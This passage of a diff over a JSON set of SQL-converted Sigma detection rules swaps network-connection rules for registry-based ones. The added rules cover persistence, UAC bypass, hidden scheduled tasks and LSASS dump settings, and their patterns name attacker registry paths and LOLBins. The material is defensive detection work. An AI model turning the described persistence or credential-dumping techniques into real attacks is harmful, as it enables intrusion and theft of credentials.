DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (NewValue LIKE '%cmd%' ESCAPE '\\' OR NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%wsl%' ESCAPE '\\' OR NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" }, { - "title": "Dllhost Internet Connection", - "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", "status": "test", - "description": "Detects Dllhost that communicates with public IP addresses", - "author": "bartblaze", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_dllhost_net_connections.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Script Initiated Connection", - "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", - "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "title": "Registry Modification to Hidden File Extension", + "id": "5df86130-4e95-4a54-90f7-26541b40aec2", + "status": "test", + "description": "Hides the file extension through modification of the registry", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate scripts" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)')))" ], - "filename": "net_connection_win_script.yml" + "filename": "registry_set_hidden_extention.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": "experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_set_comhijack_sdclt.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Potential Persistence Via Visual Studio Tools for Office", - "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", "status": "experimental", - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "author": "Bhabesh Raj", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1137.006", - "attack.persistence" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate Addin Installation" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_persistence_office_vsto.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Wow6432Node CurrentVersion Autorun Keys Modification", - "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "title": "Enable Local Manifest Installation With Winget", + "id": "fa277e82-9b78-42dd-b05c-05555c7b6015", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Administrators or developers might enable this for testing purposes or to install custom private packages" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (NewValue LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR NewValue = 'grpconv -o' OR NewValue LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND NewValue LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND NewValue LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND NewValue LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND NewValue LIKE '% /burn.runonce' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\AppInstaller\\\\EnableLocalManifestFiles' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" + "filename": "registry_set_winget_enable_local_manifest.yml" }, { - "title": "Outlook Security Settings Updated - Registry", - "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects changes to the registry values related to outlook security settings", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", "author": "frack113", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1547.010" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" ], - "filename": "registry_set_office_outlook_security_settings.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "title": "Classes Autorun Keys Modification", + "id": "9df5f547-c86a-433e-b533-f2794357e242", "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ "attack.persistence", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE 